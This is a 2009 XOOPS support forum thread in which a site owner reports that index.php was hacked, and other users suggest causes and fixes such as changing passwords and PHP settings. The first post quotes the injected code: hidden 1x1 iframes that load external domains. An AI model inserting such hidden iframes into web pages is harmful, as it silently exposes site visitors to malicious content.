1
shalommemphi
FILE index.php HACKED

Today after over 4 years with no problem one of my sites was hacked. The index.php file had this added to the end.
------------------------------------------
echo "<iframe src=\"http://goooogleadsence.biz/?click=6B7C7A\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

?>
<iframe src="http://superbetfair.cn/in.cgi?income43" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://superbetfair.cn/in.cgi?income44" width=1 height=1 style="visibility: hidden"></iframe>
--------------------------------------------
FIRST: How can I protect to ensure this isn't done again. I have made sure the index.php file is set to READ only permission 444. Has anyone else had this issue.
Helping each other with Knowledge

2
bjuti
Re: FILE index.php HACKED
  • 2009/4/7 13:39

  • bjuti

  • Just can't stay away

  • Posts: 871

  • Since: 2009/1/7 2


I had similar situation with one site made with XOOPS 2.0.18 i think.

As far as i know, and I'm not an expert on this, this hack is caused by trojan who entered on server via ftp passwords from your system.

That's my opinion.

3
DonCurioso
Re: FILE index.php HACKED

A die site called xoopsdemos had these same problem... two days after, it was hacked by a well-knowed turkish hackers group.

Close your site, ask your hosting service about this & change right now all your passw. I hope you´ll have a database backup copy.

All da best luck with it.
HispaXoops | Xoops España

That's the way i like it! | Nada mejor que una Alhambra bien helada con aceitunas...

4
shalommemphi
Re: FILE index.php HACKED

After checking into it all sites on my hosting server with the file name of index.php had this malware attack and were hacked.

Luckily the hosting provider was able to search and delete all the files where this hack place the <iframe> code.

Trying to see how it got into the server is another issue:

JOOMLA forums had the same problem and described it as a CLIENT SIDE access to the server.
Helping each other with Knowledge

5
Watchmanz
Re: FILE index.php HACKED
  • 2009/4/15 4:22

  • Watchmanz

  • Just popping in

  • Posts: 32

  • Since: 2008/3/11


To be honest, I'd be looking at changing hosting providers as it appears the attack happened on their server. Their security can't be that great.

6
ghia
Re: FILE index.php HACKED
  • 2009/4/15 9:58

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


Quote:
Their security can't be that great.
Hackers tend to break in, always just before security patches are released.

7
hrac
Re: FILE index.php HACKED
  • 2009/4/22 16:44

  • hrac

  • Quite a regular

  • Posts: 305

  • Since: 2002/7/15


Hello,

Were protector module installed and following parameters were set off while it was hacked?
register_globals : off
allow_url_fopen : off

Thanks

8
ghia
Re: FILE index.php HACKED
  • 2009/4/22 17:48

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


What are you asking?
How to switch off the settings for register_globals and allow_url_fopen?

9
hrac
Re: FILE index.php HACKED
  • 2009/4/22 18:29

  • hrac

  • Quite a regular

  • Posts: 305

  • Since: 2002/7/15


I am asking when the site was hacked these settings are ok?

10
ghia
Re: FILE index.php HACKED
  • 2009/4/22 18:46

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


The off setting is correct.

Login

Username:
Password:

Lost Password? Register now!

Who's Online

75 user(s) are online (43 user(s) are browsing Support Forums)


Members: 0


Guests: 75


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: May 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits